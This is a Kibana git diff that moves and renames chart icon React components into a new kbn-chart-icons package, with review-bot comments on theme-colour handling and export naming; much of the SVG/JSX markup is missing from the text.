packages/kbn-chart-icons/src/assets/chart_area_stacked.tsx index 16e1ff849b609..3bfe3cd92b85b 100644 --- a/x-pack/plugins/lens/public/assets/chart_area_stacked.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_area_stacked.tsx 
@@ -1,18 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartAreaStacked = ({ - title, - titleId, - ...props -}: Omit) => ( +export const IconChartAreaStacked = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar.tsx b/packages/kbn-chart-icons/src/assets/chart_bar.tsx similarity index 83% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar.tsx index f134d7871bfde..f33b83fca5362 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar.tsx @@ -8,8 +8,9 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconChartBar = ({ title, titleId, ...props }: Omit) => ( {title ? {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_annotations.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_annotations.tsx similarity index 73% rename from x-pack/plugins/lens/public/assets/chart_bar_annotations.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_annotations.tsx index 63fc9023533f6..9472cbc0cd762 100644 --- a/x-pack/plugins/lens/public/assets/chart_bar_annotations.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_annotations.tsx 
@@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartBarAnnotations = ({ +export const IconChartBarAnnotations = ({ title, titleId, ...props @@ -25,11 +27,11 @@ export const LensIconChartBarAnnotations = ({ {title ? {title} : null} diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal.tsx similarity index 80% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_horizontal.tsx index a2fb843cb095d..dc113a8ab4ad9 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal.tsx @@ -8,8 +8,13 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarHorizontalIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconChartBarHorizontal = ({ + title, + titleId, + ...props +}: Omit) => ( {title} : null} ); 
diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_percentage.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal_percentage.tsx similarity index 87% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_percentage.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_horizontal_percentage.tsx index 6b2bb61a246e1..91e8f2639bfa5 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_percentage.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal_percentage.tsx @@ -8,8 +8,9 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarHorizontalPercentageIcon = ({ +export const IconChartBarHorizontalPercentage = ({ title, titleId, ...props @@ -26,11 +27,11 @@ export const BarHorizontalPercentageIcon = ({ {title ? {title} : null} ); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_stacked.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal_stacked.tsx similarity index 87% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_stacked.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_horizontal_stacked.tsx index b399c47d3fc7d..6e5e61e386467 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_stacked.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal_stacked.tsx @@ -8,8 +8,9 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarHorizontalStackedIcon = ({ +export const IconChartBarHorizontalStacked = ({ title, titleId, ...props @@ -26,11 +27,11 @@ export const BarHorizontalStackedIcon = ({ {title ? {title} : null} ); 
diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_percentage.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_percentage.tsx similarity index 82% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar_percentage.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_percentage.tsx index 64514cea6c012..82a59ebc9be32 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_percentage.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_percentage.tsx @@ -8,8 +8,13 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarPercentageIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconChartBarPercentage = ({ + title, + titleId, + ...props +}: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_reference_line.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_reference_line.tsx similarity index 79% rename from x-pack/plugins/lens/public/assets/chart_bar_reference_line.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_reference_line.tsx index 447641540a284..d8cca5a3f1192 100644 --- a/x-pack/plugins/lens/public/assets/chart_bar_reference_line.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_reference_line.tsx 
@@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartBarReferenceLine = ({ +export const IconChartBarReferenceLine = ({ title, titleId, ...props @@ -25,16 +27,10 @@ export const LensIconChartBarReferenceLine = ({ {title ? {title} : null} - + ); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_stacked.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_stacked.tsx similarity index 83% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar_stacked.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_stacked.tsx index 833f3d0e816e6..933be6d5dea7a 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_stacked.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_stacked.tsx @@ -8,8 +8,9 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarStackedIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconChartBarStacked = ({ title, titleId, ...props }: Omit) => ( {title ? {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_datatable.tsx b/packages/kbn-chart-icons/src/assets/chart_datatable.tsx similarity index 75% rename from x-pack/plugins/lens/public/assets/chart_datatable.tsx rename to packages/kbn-chart-icons/src/assets/chart_datatable.tsx index d6a5cb733e1e1..144d6ddb906f5 100644 --- a/x-pack/plugins/lens/public/assets/chart_datatable.tsx 
+++ b/packages/kbn-chart-icons/src/assets/chart_datatable.tsx @@ -1,18 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartDatatable = ({ - title, - titleId, - ...props -}: Omit) => ( +export const IconChartDatatable = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_donut.tsx b/packages/kbn-chart-icons/src/assets/chart_donut.tsx similarity index 71% rename from x-pack/plugins/lens/public/assets/chart_donut.tsx rename to packages/kbn-chart-icons/src/assets/chart_donut.tsx index f2ce65a1f2e19..bd9e3f59e72a1 100644 --- a/x-pack/plugins/lens/public/assets/chart_donut.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_donut.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartDonut = ({ title, titleId, ...props }: Omit) => ( +export const IconChartDonut = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); 
diff --git a/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_icon.tsx b/packages/kbn-chart-icons/src/assets/chart_heatmap.tsx similarity index 85% rename from src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_icon.tsx rename to packages/kbn-chart-icons/src/assets/chart_heatmap.tsx index 7a49d53222946..0609c7263f202 100644 --- a/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_icon.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_heatmap.tsx @@ -8,11 +8,9 @@ import { EuiIconProps } from '@elastic/eui'; import React from 'react'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const HeatmapIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); +import { colors } from './common_styles'; +export const IconChartHeatmap = ({ title, titleId, ...props }: Omit) => { return ( {title ? {title} : null} diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/icons/horizontal_bullet_icon.tsx b/packages/kbn-chart-icons/src/assets/chart_horizontal_bullet.tsx similarity index 80% rename from src/plugins/chart_expressions/expression_gauge/public/components/icons/horizontal_bullet_icon.tsx rename to packages/kbn-chart-icons/src/assets/chart_horizontal_bullet.tsx index 5074f00801109..0765444e857a6 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/icons/horizontal_bullet_icon.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_horizontal_bullet.tsx 
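Review bot: `IconChartHeatmap` now takes its fill styles from a static `colors` import from `./common_styles` in place of the `chartIcon` value previously obtained from the `useCommonChartStyles()` hook; if that hook resolved theme-dependent values at render time, a module-level constant may no longer follow a theme switch, so it is worth confirming that `common_styles` (not in this diff) derives its values in a way that still tracks the active theme — the `//packages/kbn-ui-theme` dependency added to BUILD.bazel suggests it may. The same hook-to-constant replacement appears in the horizontal-bullet and vertical-bullet hunks. The body of `IconChartHeatmap` continues outside the hunk.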
@@ -8,11 +8,13 @@ import React from 'react'; import type { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const HorizontalBulletIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); +import { colors } from './common_styles'; +export const IconChartHorizontalBullet = ({ + title, + titleId, + ...props +}: Omit) => { return ( {title ? {title} : null} diff --git a/x-pack/plugins/lens/public/assets/chart_line.tsx b/packages/kbn-chart-icons/src/assets/chart_line.tsx similarity index 83% rename from x-pack/plugins/lens/public/assets/chart_line.tsx rename to packages/kbn-chart-icons/src/assets/chart_line.tsx index 82df68d8fd43c..afaf31b708621 100644 --- a/x-pack/plugins/lens/public/assets/chart_line.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_line.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartLine = ({ title, titleId, ...props }: Omit) => ( +export const IconChartLine = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_metric.tsx b/packages/kbn-chart-icons/src/assets/chart_metric.tsx similarity index 75% rename from x-pack/plugins/lens/public/assets/chart_metric.tsx rename to packages/kbn-chart-icons/src/assets/chart_metric.tsx index d15be760eec60..4feb162a4607c 100644 --- a/x-pack/plugins/lens/public/assets/chart_metric.tsx 
+++ b/packages/kbn-chart-icons/src/assets/chart_metric.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartMetric = ({ title, titleId, ...props }: Omit) => ( +export const IconChartMetric = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_mixed_xy.tsx b/packages/kbn-chart-icons/src/assets/chart_mixed_xy.tsx similarity index 84% rename from x-pack/plugins/lens/public/assets/chart_mixed_xy.tsx rename to packages/kbn-chart-icons/src/assets/chart_mixed_xy.tsx index bb213217a9fa9..af86b96852dc9 100644 --- a/x-pack/plugins/lens/public/assets/chart_mixed_xy.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_mixed_xy.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartMixedXy = ({ title, titleId, ...props }: Omit) => ( +export const IconChartMixedXy = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); 
diff --git a/x-pack/plugins/lens/public/assets/chart_mosaic.tsx b/packages/kbn-chart-icons/src/assets/chart_mosaic.tsx similarity index 73% rename from x-pack/plugins/lens/public/assets/chart_mosaic.tsx rename to packages/kbn-chart-icons/src/assets/chart_mosaic.tsx index c385f0df1a008..23fe548074d5a 100644 --- a/x-pack/plugins/lens/public/assets/chart_mosaic.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_mosaic.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import type { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartMosaic = ({ title, titleId, ...props }: Omit) => ( +export const IconChartMosaic = ({ title, titleId, ...props }: Omit) => ( {title ? : null} diff --git a/x-pack/plugins/lens/public/assets/chart_pie.tsx b/packages/kbn-chart-icons/src/assets/chart_pie.tsx similarity index 68% rename from x-pack/plugins/lens/public/assets/chart_pie.tsx rename to packages/kbn-chart-icons/src/assets/chart_pie.tsx index 56a18b9d61624..16d59e73603ca 100644 --- a/x-pack/plugins/lens/public/assets/chart_pie.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_pie.tsx 
@@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartPie = ({ title, titleId, ...props }: Omit) => ( +export const IconChartPie = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_treemap.tsx b/packages/kbn-chart-icons/src/assets/chart_treemap.tsx similarity index 64% rename from x-pack/plugins/lens/public/assets/chart_treemap.tsx rename to packages/kbn-chart-icons/src/assets/chart_treemap.tsx index c56fdedfebdf7..587682994102a 100644 --- a/x-pack/plugins/lens/public/assets/chart_treemap.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_treemap.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartTreemap = ({ title, titleId, ...props }: Omit) => ( +export const IconChartTreemap = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); 
diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/icons/vertical_bullet_icon.tsx b/packages/kbn-chart-icons/src/assets/chart_vertical_bullet.tsx similarity index 77% rename from src/plugins/chart_expressions/expression_gauge/public/components/icons/vertical_bullet_icon.tsx rename to packages/kbn-chart-icons/src/assets/chart_vertical_bullet.tsx index 49a1e2a817cf7..5cf427af7d238 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/icons/vertical_bullet_icon.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_vertical_bullet.tsx @@ -8,11 +8,13 @@ import React from 'react'; import type { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const VerticalBulletIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); +import { colors } from './common_styles'; +export const IconChartVerticalBullet = ({ + title, + titleId, + ...props +}: Omit) => { return ( {title ? {title} : null} diff --git a/x-pack/plugins/lens/public/assets/chart_waffle.tsx b/packages/kbn-chart-icons/src/assets/chart_waffle.tsx similarity index 80% rename from x-pack/plugins/lens/public/assets/chart_waffle.tsx rename to packages/kbn-chart-icons/src/assets/chart_waffle.tsx index b9ee0557faea9..aeeca67a1a511 100644 --- a/x-pack/plugins/lens/public/assets/chart_waffle.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_waffle.tsx 
@@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import type { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartWaffle = ({ title, titleId, ...props }: Omit) => ( +export const IconChartWaffle = ({ title, titleId, ...props }: Omit) => ( {title ? : null} diff --git a/packages/kbn-chart-icons/src/assets/common_styles.tsx b/packages/kbn-chart-icons/src/assets/common_styles.tsx new file mode 100644 index 0000000000000..21409b5cb6670 --- /dev/null +++ b/packages/kbn-chart-icons/src/assets/common_styles.tsx @@ -0,0 +1,23 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { css } from '@emotion/css'; +import { euiThemeVars } from '@kbn/ui-theme'; + +export const colors = { + subdued: css` + fill: ${euiThemeVars.euiTextSubduedColor}; + `, + accent: css` + fill: ${euiThemeVars.euiColorVis0}; + `, +}; + +export const noFill = css` + fill: none; +`; diff --git a/x-pack/plugins/lens/public/assets/drop_illustration.tsx b/packages/kbn-chart-icons/src/assets/drop_illustration.tsx similarity index 99% rename from x-pack/plugins/lens/public/assets/drop_illustration.tsx rename to packages/kbn-chart-icons/src/assets/drop_illustration.tsx index acd6d7bf31324..c35d46f48c758 100644 
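Review bot: `colors` and `noFill` read `euiThemeVars` inside module-level `css` templates, so the fill colours are resolved once when `common_styles` is first imported rather than per render; the vertical_bullet hunk above replaced a `useCommonChartStyles()` hook with these constants, so if the EUI theme can switch at runtime the icons would keep the first theme's colours — worth confirming against how `euiThemeVars` is populated. The new file contains no JSX, so a `.ts` extension fits it better than `.tsx`. A one-line header such as `/** Shared emotion fill classes for the chart icons, derived from the EUI theme variables. */` above `colors` would also help readers coming from the barrel.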
--- a/x-pack/plugins/lens/public/assets/drop_illustration.tsx +++ b/packages/kbn-chart-icons/src/assets/drop_illustration.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; import { EuiIconProps } from '@elastic/eui'; export const DropIllustration = ({ title, titleId, ...props }: Omit) => ( diff --git a/x-pack/plugins/lens/public/assets/globe_illustration.tsx b/packages/kbn-chart-icons/src/assets/globe_illustration.tsx similarity index 98% rename from x-pack/plugins/lens/public/assets/globe_illustration.tsx rename to packages/kbn-chart-icons/src/assets/globe_illustration.tsx index af2f2c7a48e46..b84d39705f632 100644 --- a/x-pack/plugins/lens/public/assets/globe_illustration.tsx +++ b/packages/kbn-chart-icons/src/assets/globe_illustration.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; import { EuiIconProps } from '@elastic/eui'; export const GlobeIllustration = ({ title, titleId, ...props }: Omit) => ( 
diff --git a/packages/kbn-chart-icons/src/assets/index.ts b/packages/kbn-chart-icons/src/assets/index.ts new file mode 100644 index 0000000000000..d3d2f968cdcc5 --- /dev/null +++ b/packages/kbn-chart-icons/src/assets/index.ts 
@@ -0,0 +1,42 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0 and the Server Side Public License, v 1; you may not use this file except
+ * in compliance with, at your election, the Elastic License 2.0 or the Server
+ * Side Public License, v 1.
+ */
+
+export { IconCircle, IconTriangle } from './annotation_icons';
+
+export { EuiIconAxisBottom } from './axis_bottom';
+export { EuiIconAxisLeft } from './axis_left';
+export { EuiIconAxisRight } from './axis_right';
+export { EuiIconAxisTop } from './axis_top';
+
+export { IconChartArea } from './chart_area';
+export { IconChartAreaPercentage } from './chart_area_percentage';
+export { IconChartAreaStacked } from './chart_area_stacked';
+export { IconChartBar } from './chart_bar';
+export { IconChartBarAnnotations } from './chart_bar_annotations';
+export { IconChartBarHorizontal } from './chart_bar_horizontal';
+export { IconChartBarHorizontalPercentage } from './chart_bar_horizontal_percentage';
+export { IconChartBarHorizontalStacked } from './chart_bar_horizontal_stacked';
+export { IconChartBarPercentage } from './chart_bar_percentage';
+export { IconChartBarReferenceLine } from './chart_bar_reference_line';
+export { IconChartBarStacked } from './chart_bar_stacked';
+export { IconChartDatatable } from './chart_datatable';
+export { IconChartDonut } from './chart_donut';
+export { IconChartLine } from './chart_line';
+export { IconChartMetric } from './chart_metric';
+export { IconChartMixedXy } from './chart_mixed_xy';
+export { IconChartMosaic } from './chart_mosaic';
+export { IconChartPie } from './chart_pie';
+export { IconChartTreemap } from './chart_treemap';
+export { IconChartWaffle } from './chart_waffle';
+export { DropIllustration } from './drop_illustration';
+export { GlobeIllustration } from './globe_illustration';
+export { EuiIconLegend } from './legend';
+export { 
IconRegionMap } from './region_map'; +export { IconChartHeatmap } from './chart_heatmap'; +export { IconChartHorizontalBullet } from './chart_horizontal_bullet'; +export { IconChartVerticalBullet } from './chart_vertical_bullet'; diff --git a/x-pack/plugins/lens/public/assets/legend.tsx b/packages/kbn-chart-icons/src/assets/legend.tsx similarity index 84% rename from x-pack/plugins/lens/public/assets/legend.tsx rename to packages/kbn-chart-icons/src/assets/legend.tsx index cde39b222cdd4..ce1a8ef9dcbc4 100644 --- a/x-pack/plugins/lens/public/assets/legend.tsx +++ b/packages/kbn-chart-icons/src/assets/legend.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; export const EuiIconLegend = ({ title, titleId, ...props }: { title: string; titleId: string }) => ( {title ? : null} diff --git a/src/plugins/charts/public/static/utils/index.ts b/packages/kbn-chart-icons/src/index.ts similarity index 89% rename from src/plugins/charts/public/static/utils/index.ts rename to packages/kbn-chart-icons/src/index.ts index efb6e72823d73..f279aa93de165 100644 --- a/src/plugins/charts/public/static/utils/index.ts +++ b/packages/kbn-chart-icons/src/index.ts @@ -6,4 +6,4 @@ * Side Public License, v 1. */ -export * from './transform_click_event'; +export * from './assets'; 
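Review bot: The public surface of this barrel mixes two naming schemes — most exports are `Icon*`/`IconChart*`, but `EuiIconAxisBottom`, `EuiIconAxisLeft`, `EuiIconAxisRight`, `EuiIconAxisTop` and `EuiIconLegend` keep an `EuiIcon` prefix even though (as the legend hunk below shows for `EuiIconLegend`) they are local components rather than EUI ones. Since this commit already renames `LensIconChart*` to `IconChart*`, aligning those five now avoids a second breaking rename of the package API later. The last four exports (`IconRegionMap`, `IconChartHeatmap`, `IconChartHorizontalBullet`, `IconChartVerticalBullet`) also break the alphabetical order the rest of the file follows; moving them into place keeps the list scannable.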
diff --git a/packages/kbn-shared-ux-services/tsconfig.json b/packages/kbn-chart-icons/tsconfig.json
old mode 100755
new mode 100644
similarity index 76%
rename from packages/kbn-shared-ux-services/tsconfig.json
rename to packages/kbn-chart-icons/tsconfig.json
index 789c6b3111115..1984d8ed8bbef
--- a/packages/kbn-shared-ux-services/tsconfig.json
+++ b/packages/kbn-chart-icons/tsconfig.json
@@ -6,13 +6,14 @@
  "emitDeclarationOnly": true,
  "outDir": "target_types",
  "rootDir": "src",
- "stripInternal": false,
  "types": [
  "jest",
- "node"
- ]
+ "node",
+ "react",
+ "@emotion/css/types"
+ ],
  },
  "include": [
- "src/**/*"
+ "src/**/*",
  ]
  }
diff --git a/packages/kbn-coloring/BUILD.bazel b/packages/kbn-coloring/BUILD.bazel
index 4b20561e70c96..f266fe42a904d 100644
--- a/packages/kbn-coloring/BUILD.bazel
+++ b/packages/kbn-coloring/BUILD.bazel
@@ -41,7 +41,6 @@ NPM_MODULE_EXTRA_FILES = [
  RUNTIME_DEPS = [
  "//packages/kbn-i18n",
  "//packages/kbn-i18n-react",
- "//packages/kbn-shared-ux-storybook",
  "//packages/kbn-interpreter",
  "//packages/kbn-utility-types",
  "//packages/kbn-shared-ux-utility",
@@ -65,7 +64,6 @@ RUNTIME_DEPS = [
  TYPES_DEPS = [
  "//packages/kbn-i18n:npm_module_types",
  "//packages/kbn-i18n-react:npm_module_types",
- "//packages/kbn-shared-ux-storybook:npm_module_types",
  "//packages/kbn-interpreter:npm_module_types",
  "//packages/kbn-utility-types:npm_module_types",
  "//packages/kbn-shared-ux-utility:npm_module_types",
diff --git a/packages/kbn-config/BUILD.bazel b/packages/kbn-config/BUILD.bazel
index 13cff50a1a2d7..4eeda0470542c 100644
--- a/packages/kbn-config/BUILD.bazel
+++ b/packages/kbn-config/BUILD.bazel
@@ -30,7 +30,7 @@ NPM_MODULE_EXTRA_FILES = [
  ]
 
  RUNTIME_DEPS = [
- "//packages/elastic-safer-lodash-set",
+ "//packages/kbn-safer-lodash-set",
  "//packages/kbn-config-schema",
  "//packages/kbn-logging",
  "//packages/kbn-logging-mocks",
